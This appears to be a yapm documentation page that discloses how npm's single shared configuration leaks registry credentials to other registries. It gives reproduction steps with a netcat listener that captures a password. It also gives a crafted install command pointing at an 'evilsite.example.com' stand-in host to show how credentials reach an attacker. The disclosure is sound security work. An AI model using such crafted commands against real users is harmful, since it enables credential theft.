Registry-specific configuration: security fixes
----------------------------------------------

`npm` keeps a single configuration for all registries. If you use more than one registry, `npm` can leak the credentials you entered for one registry to another. A user can also be tricked into exposing their credentials by a crafted command-line string.

`yapm` keeps a separate configuration for each registry, so this flaw no longer exists. See [here](multireg-conf.md) for details about how it's done.

With a single shared configuration, if you have authenticated to one registry and then make a request to another, `npm` can send sensitive information (your username and password) to that second registry. This matters most when you use multiple registries administered by different people, who have no reason to trust each other.

Think of a browser that shared authentication info with all websites: if one site stored a cookie, the browser would send it with every request to every site. If you only ever use one website, this approach works. If you use several, it is a critical security flaw.

### This is how you can replicate this bug:

Authenticate yourself in the main registry:

```
$ npm adduser --registry http://registry.npmjs.org/
```

Create a new package and publish it to a registry you never logged in to (here, a listener on `localhost:8080`, set up in the next step before you run `npm publish`):

```
$ mkdir test ; cd test ; echo '{"name":"test","version":"0.0.0"}' > package.json
$ npm publish --registry http://localhost:8080/
```

Listen for all requests on that port in a separate terminal (start the listener before you run `npm publish`) and watch what arrives:

```
$ nc -l 8080
POST /_session HTTP/1.1
host: localhost:8080
accept: application/json
content-type: application/json
content-length: 40
Connection: keep-alive

{"name":"test","password":"test"}
```

Do you see it? `npm` is sending the password you entered for `registry.npmjs.org` to a completely different registry (`localhost:8080`), even though you never typed it for this command: it was pulled out of the shared configuration written by the earlier `npm adduser`.

### always-auth issues

It gets even worse with the `always-auth` setting turned on. Without it, `npm` only authenticates on write requests such as `publish`; with it, every request, including a plain `install`, carries your credentials, so a registry URL supplied on the command line is enough to receive them:

```
$ npm install foobar --reg http://evilsite.example.com/ --always-auth=true
```
|